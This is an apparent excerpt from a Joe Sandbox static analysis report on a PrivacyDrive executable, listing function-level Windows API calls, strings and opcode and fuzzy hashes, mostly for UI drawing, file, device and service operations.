                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: DeleteEnum$CloseOpenlstrlen
                                • String ID:
                                • API String ID: 242527159-0
                                • Opcode ID: 7417a38eecbe98fe67114ba03710a45c9d9d61469adfb44cd8c06802587ace82
                                • Instruction ID: 5ba99d398154806853dd991caee1d39484c6cc6b7a438dd55f6cbec05c54d8f4
                                • Opcode Fuzzy Hash: 7417a38eecbe98fe67114ba03710a45c9d9d61469adfb44cd8c06802587ace82
                                • Instruction Fuzzy Hash: 3631A33174021CABDB209B65DC99FEBB3BCEF94711F0000AEFA09D2190DA749D44DBA4
                                APIs
                                  • Part of subcall function 0040E530: _memmove.LIBCMT ref: 0040E5A4
                                • _memset.LIBCMT ref: 0041C8E0
                                • ShellExecuteExW.SHELL32(0000003C), ref: 0041C9AC
                                • Sleep.KERNEL32(00000064), ref: 0041C9C5
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExecuteShellSleep_memmove_memset
                                • String ID: !@$/FormatDialog %u %d$<
                                • API String ID: 2977420029-3687950762
                                • Opcode ID: 98c7388262d54147b5cd20b60f634ae92d02d9b8b92a96a7f252d162ccbb6487
                                • Instruction ID: 6ab44b0f287efee857454f046b5324c017087149d1c745bc6a9b9ddb34b63ada
                                • Opcode Fuzzy Hash: 98c7388262d54147b5cd20b60f634ae92d02d9b8b92a96a7f252d162ccbb6487
                                • Instruction Fuzzy Hash: FB5109B15183809FD320CF65C849B8BBBE4BF85718F104A1DF198862A0DBB99448CF97
                                APIs
                                • GetDC.USER32(00000000), ref: 004A9B8B
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 004A9BA9
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 004A9C1A
                                • GdipMeasureString.GDIPLUS(?,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 004A9C66
                                • ReleaseDC.USER32(00000000,00000000), ref: 004A9C78
                                • GdipDeleteStringFormat.GDIPLUS(?), ref: 004A9C99
                                • GdipDeleteGraphics.GDIPLUS(?), ref: 004A9CA8
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFormat$FromGraphicsMeasureRelease
                                • String ID:
                                • API String ID: 2860005999-0
                                • Opcode ID: 8969f980e096e40a97389ad7d65aa7a47887f323a7ccc1eccfcb5e617cc66a3d
                                • Instruction ID: 01edee387bd62305a43ce7bf6ea8ff25af4d2fe53371fa110ab4a18a9486803e
                                • Opcode Fuzzy Hash: 8969f980e096e40a97389ad7d65aa7a47887f323a7ccc1eccfcb5e617cc66a3d
                                • Instruction Fuzzy Hash: 134169B25083409FD310CF15D958B6BFBE4FB9A725F004A1EF98597290E7B5A848CB92
                                APIs
                                • GdipAlloc.GDIPLUS(00000010,7563D392,?,?,00000001,?,?,?,?,?,004CC627,00000001,?,?,0049FC60,7563D392), ref: 004CB309
                                  • Part of subcall function 00420760: GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,0026200A,00000000,7563D392), ref: 004207B8
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005,?,?,?,004CC627,00000001,?,?,0049FC60,7563D392), ref: 004CB358
                                • GdipGraphicsClear.GDIPLUS(00000000,00000000,?,?,?,004CC627,00000001,?,?,0049FC60,7563D392), ref: 004CB36B
                                • GdipGetDpiX.GDIPLUS(00000000,?,?,?,?,004CC627,00000001,?,?,0049FC60,7563D392), ref: 004CB380
                                • GdipGetDpiY.GDIPLUS(?,?,?,?,?,004CC627,00000001,?,?,0049FC60,7563D392), ref: 004CB395
                                • CreateCompatibleDC.GDI32(00000000), ref: 004CB3CB
                                • SelectObject.GDI32(00000000,?), ref: 004CB3DC
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$Create$AllocBitmapClearCompatibleFromGraphicsHintObjectRenderingScan0SelectText
                                • String ID:
                                • API String ID: 2362702511-0
                                • Opcode ID: feb46c05903e1c5d074e86a44ef3e7b11108a4ee4eb49ed9725f92b6ec00a1d2
                                • Instruction ID: cfc07241ca65fda0a3d5711262874b255f10238e8603e7bf986d32a52348c60a
                                • Opcode Fuzzy Hash: feb46c05903e1c5d074e86a44ef3e7b11108a4ee4eb49ed9725f92b6ec00a1d2
                                • Instruction Fuzzy Hash: F0417975A00746EFDB609F25DC05B6ABBE8FF45310F10852EE855D72A0EB35E810DB94
                                APIs
                                • GdipCreateImageAttributes.GDIPLUS(?,7563D392), ref: 004CB6F6
                                  • Part of subcall function 004CB610: GdipSetImageAttributesColorMatrix.GDIPLUS(?,00000001,00000001,?,00000000,00000000), ref: 004CB697
                                • GdipGetImageHeight.GDIPLUS(?,00000000,00000000,00000000), ref: 004CB729
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 004CB74C
                                • GdipGetImageHeight.GDIPLUS(?,00000000), ref: 004CB769
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 004CB783
                                • GdipDrawImageRectRectI.GDIPLUS(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000000,00000000), ref: 004CB7B4
                                • GdipDisposeImageAttributes.GDIPLUS(00000000), ref: 004CB7CB
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$Attributes$HeightRectWidth$ColorCreateDisposeDrawMatrix
                                • String ID:
                                • API String ID: 4130812555-0
                                • Opcode ID: d09d500d7309e5c5d1e87975e270e9c4c281bc36e7f22bf7e5008d54abdea5aa
                                • Instruction ID: c0d227519754e4b39b19ccc4e1cce4b975024998ed42df57f921cb8346773cb4
                                • Opcode Fuzzy Hash: d09d500d7309e5c5d1e87975e270e9c4c281bc36e7f22bf7e5008d54abdea5aa
                                • Instruction Fuzzy Hash: D44105B690020AEFDF11CF94CD41B9EBBB8FB08710F10852AE915A6690E735A914DFA4
                                APIs
                                • SHGetFileInfoW.SHELL32(00000000,00000000,?,000002B4,00000000), ref: 0041C7BF
                                • ShellExecuteW.SHELL32(00000000,OPEN,Explorer.exe ,00000000,0056C344,00000005), ref: 0041C7E4
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExecuteFileInfoShell
                                • String ID: !@$%c:\$Explorer.exe $OPEN
                                • API String ID: 1133623499-2802593334
                                • Opcode ID: 015de67119340627b675fe1f80bda14d1ac628fb28006b9ab4842001112d76a2
                                • Instruction ID: ff612def2dd17d2acbf77aef04f1b3c5f8c4cc232cdfc81b404466fdaa2c8c8f
                                • Opcode Fuzzy Hash: 015de67119340627b675fe1f80bda14d1ac628fb28006b9ab4842001112d76a2
                                • Instruction Fuzzy Hash: 7A3128B1E40249EFDB00DF94C849BEEBBB4FB08718F104629E515B72C0D7B46648CBA5
                                APIs
                                • GdipResetPath.GDIPLUS(?,?,?,7348BEC0,?,0041743C), ref: 004196C3
                                • GdipAddPathArcI.GDIPLUS(?,?,?,<tA,<tA), ref: 004196FC
                                • GdipAddPathArcI.GDIPLUS(?,?,?,?,?), ref: 00419726
                                • GdipAddPathLineI.GDIPLUS(?,?,00000044,00000000,00000044,?,?,?,?), ref: 0041973F
                                • GdipClosePathFigure.GDIPLUS(?,?,00000044,00000000,00000044,?,?,?,?), ref: 0041974E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipPath$CloseFigureLineReset
                                • String ID: <tA
                                • API String ID: 2147720564-2562197522
                                • Opcode ID: bff98cd3ea13e52b3520d185215e46741d522d5054ca37735d535be176ef0666
                                • Instruction ID: 7d0619f2148fba08b5a944834efcd86dca7f7e835bd715ea69931eb96bbb399b
                                • Opcode Fuzzy Hash: bff98cd3ea13e52b3520d185215e46741d522d5054ca37735d535be176ef0666
                                • Instruction Fuzzy Hash: 3E211AB1210209EFEB209F64DD54A6B7BE9EF44741F14882EF898CB610E731EC54DB60
                                APIs
                                • InitializeCriticalSection.KERNEL32(?,7563D392), ref: 0042D964
                                • LoadCursorW.USER32 ref: 0042D9CF
                                • RegisterClassExW.USER32(00000030), ref: 0042D9F8
                                • __CxxThrowException@8.LIBCMT ref: 0042DA13
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ClassCriticalCursorExceptionException@8InitializeLoadRaiseRegisterSectionThrow
                                • String ID: 0$cbfx_ToolTipWnd
                                • API String ID: 3973570152-2891778664
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,?,?,?,?,0041D6F6), ref: 0041CADD
                                • OpenServiceW.ADVAPI32(00000000,?,000F01FF,75A90460,?,?,?,?,?,?,?,?,0041D6F6), ref: 0041CAF2
                                • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,0041D6F6), ref: 0041CB05
                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 0041CB1C
                                • Sleep.KERNEL32(000003E8), ref: 0041CB2B
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,0041D6F6), ref: 0041CB3F
                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?,0041D6F6), ref: 0041CB48
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Service$CloseHandleOpen$ControlManagerQuerySleepStatus
                                • String ID:
                                • API String ID: 2392001508-0
                                APIs
                                • GdipDeleteGraphics.GDIPLUS(?,?,?,?,?,004CB3FB,?,00000001,?,7563D392,?,?,00000001,?,?), ref: 004CB1A9
                                • GdipFree.GDIPLUS(?,?,?,004CB3FB,?,00000001,?,7563D392,?,?,00000001,?,?), ref: 004CB1B0
                                • GdipDeleteGraphics.GDIPLUS(?,?,?,?,?,004CB3FB,?,00000001,?,7563D392,?,?,00000001,?,?), ref: 004CB1D0
                                • GdipFree.GDIPLUS(?,?,?,004CB3FB,?,00000001,?,7563D392,?,?,00000001,?,?), ref: 004CB1D7
                                • SelectObject.GDI32(?,00000000), ref: 004CB1ED
                                • DeleteDC.GDI32(?), ref: 004CB1F6
                                • DeleteObject.GDI32(?), ref: 004CB204
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: DeleteGdip$FreeGraphicsObject$Select
                                • String ID:
                                • API String ID: 2113326488-0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: __wfopen_s$__fread_nolock__fsopen_setvbuf
                                • String ID: /dev/random$/dev/urandom
                                • API String ID: 2173266585-2325634460
                                APIs
                                • IsWindow.USER32(?), ref: 004328E8
                                • SetForegroundWindow.USER32(?), ref: 004328FA
                                • SetActiveWindow.USER32(?), ref: 00432901
                                • SetFocus.USER32(?), ref: 00432908
                                • IsWindow.USER32(?), ref: 00432925
                                • PostMessageW.USER32(?,00001291,00000000,00000000), ref: 0043293B
                                • PostMessageW.USER32(00000111,000004CD,00000000), ref: 00432955
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Window$MessagePost$ActiveFocusForeground
                                • String ID:
                                • API String ID: 1146036800-0
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC), ref: 00432838
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,ABOUT), ref: 0043285F
                                • LeaveCriticalSection.KERNEL32(005BDCCC), ref: 00432880
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: ABOUT$Dialog$PZ
                                • API String ID: 2978645861-249930596
                                APIs
                                • TryEnterCriticalSection.KERNEL32(005BDCCC,?,00452C48,?,?,?,?,004AE6B7,7563D392), ref: 00452BD8
                                • LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,SETTINGS,?,?,?,?,004AE6B7,7563D392), ref: 00452BFF
                                • LeaveCriticalSection.KERNEL32(005BDCCC,004AE6B7,7563D392), ref: 00452C20
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: Dialog$PZ$SETTINGS
                                • API String ID: 2978645861-1332101884
                                APIs
                                • CloseHandle.KERNEL32(FFFFFFFF), ref: 004428A4
                                  • Part of subcall function 00441E60: PathFileExistsW.SHLWAPI(?), ref: 00441F50
                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00442842
                                • GetLastError.KERNEL32 ref: 00442854
                                  • Part of subcall function 004A4000: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,00402DC2,00000000,00000000,?,00000000), ref: 004A4020
                                  • Part of subcall function 004A4000: LocalFree.KERNEL32(00000000), ref: 004A404A
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 004428EC
                                • SetWindowPos.USER32(00000000), ref: 00442A67
                                • SetWindowPos.USER32(00000000), ref: 00442AC3
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: File$Window$CloseCreateErrorExistsFormatFreeHandleLastLocalMessagePathSize
                                • String ID:
                                • API String ID: 2653568980-0
                                APIs
                                  • Part of subcall function 004A5820: wsprintfW.USER32 ref: 004A584E
                                  • Part of subcall function 004A5820: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 004A586D
                                • CloseHandle.KERNEL32(?,7563D392,?,00000001), ref: 00410B26
                                  • Part of subcall function 00477320: DeviceIoControl.KERNEL32(?,07770C2C,00000000,00000000,00000000,00000004,?,00000000), ref: 0047734C
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                  • Part of subcall function 004A72E0: DeviceIoControl.KERNEL32(?,07770C40,00000000,00000285,00000000,00000285,?,00000000), ref: 004A736D
                                  • Part of subcall function 004A72E0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A7390
                                • GetLastError.KERNEL32(00000000,00000001,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00410AB5
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ControlDevice$CloseCreateErrorFileHandleLastMessagePeek_mallocwsprintf
                                • String ID: !@$%c:$0016$0022
                                • API String ID: 1442351435-2410355652
                                APIs
                                  • Part of subcall function 00421170: EnterCriticalSection.KERNEL32(005AE1C8,?,?,7563D392,?,?,?,?,?,?,?,?,?,00000000,0053DC33,000000FF), ref: 00421183
                                  • Part of subcall function 00421170: LeaveCriticalSection.KERNEL32(?,7563D392,?,?,7563D392,?,?,?,?,?,?,?,?,?,00000000,0053DC33), ref: 0042120D
                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0042C703
                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0042C72C
                                • EnterCriticalSection.KERNEL32(005AE1C8), ref: 0042C7AF
                                • LeaveCriticalSection.KERNEL32(005AE1C8,?,?,?,?,?,?,?), ref: 0042C852
                                • PostMessageW.USER32(00000111,000004DD,00000000), ref: 0042C86A
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0042C88A
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeaveLongMessageNamePath$PeekPost
                                • String ID:
                                • API String ID: 1745811624-0
                                APIs
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                  • Part of subcall function 004CB9E0: GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                  • Part of subcall function 004CB9E0: GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                  • Part of subcall function 004CB9E0: GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                  • Part of subcall function 004CB9E0: GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,00000000,00000000,?,?,?,?,00000000), ref: 0041AA11
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000001), ref: 0041AA29
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001), ref: 0041AA42
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000003), ref: 0041AA5B
                                • GdipSetStringFormatFlags.GDIPLUS(?,00001000), ref: 0041AA77
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000000,00000000,?,?,?,FF646464), ref: 0041AACB
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$CreateDelete$AlignFillRectangle$BrushDashDrawFlagsLinePen1SolidStyleTrimming
                                • String ID:
                                • API String ID: 1019150128-0
                                • Opcode ID: 0c7cd801f2e8b79ae5e794069d230d066160ccc3476be4fc033e6d1d9445a5b2
                                • Instruction ID: cb4c178fb7084e89f3ff7f45deec6abd5fe2373fc64e7f387b38af35324756ad
                                • Instruction Fuzzy Hash: 19415971208305AFD714CF14CC45F5ABBE8FB98755F000A2DF985962E0D775A948CB96
                                APIs
                                • GdipCreatePath.GDIPLUS(00000000,?,7563D392), ref: 004A146B
                                  • Part of subcall function 004195B0: GdipResetPath.GDIPLUS(00000000,?,?,7348BEC0,00000000,?,004172AC,00000003,?,?,00000001), ref: 004195C5
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 004195F1
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 00419628
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,42B3FFFF,?,?,?), ref: 0041965E
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 00419683
                                  • Part of subcall function 004195B0: GdipClosePathFigure.GDIPLUS(00000000), ref: 0041968E
                                • GdipCreatePathGradientFromPath.GDIPLUS(00000000,?), ref: 004A14F2
                                  • Part of subcall function 004193F0: GdipSetPathGradientPresetBlend.GDIPLUS(?,00000000,?,00000004), ref: 00419443
                                • GdipSetPathGradientFocusScales.GDIPLUS(?), ref: 004A155C
                                • GdipFillPath.GDIPLUS(00000002,?,00000000), ref: 004A1576
                                • GdipDeleteBrush.GDIPLUS(?), ref: 004A158F
                                • GdipDeletePath.GDIPLUS(00000000), ref: 004A159F
                                Similarity
                                • API ID: GdipPath$Gradient$CreateDelete$BlendBrushCloseFigureFillFocusFromPresetResetScales
                                • String ID:
                                • API String ID: 1027064271-0
                                • Opcode ID: 46a74715f39e323d377d7a5d684705038fd23d2524ebcf6ac418d0938d3a12ba
                                • Instruction ID: 0f23a0c0f4f8379d9378d5caa7573e4fe7b431adac56c90f6d65c828a72fdaaf
                                • Instruction Fuzzy Hash: C5417771D0124CEFDB01DFA5D845BDEBBB8FF59314F10421AE811A7290EB316A85DB90
                                APIs
                                • GdipCreatePath.GDIPLUS(00000000,?,7563D392,00000000,?,?), ref: 0043350B
                                  • Part of subcall function 004195B0: GdipResetPath.GDIPLUS(00000000,?,?,7348BEC0,00000000,?,004172AC,00000003,?,?,00000001), ref: 004195C5
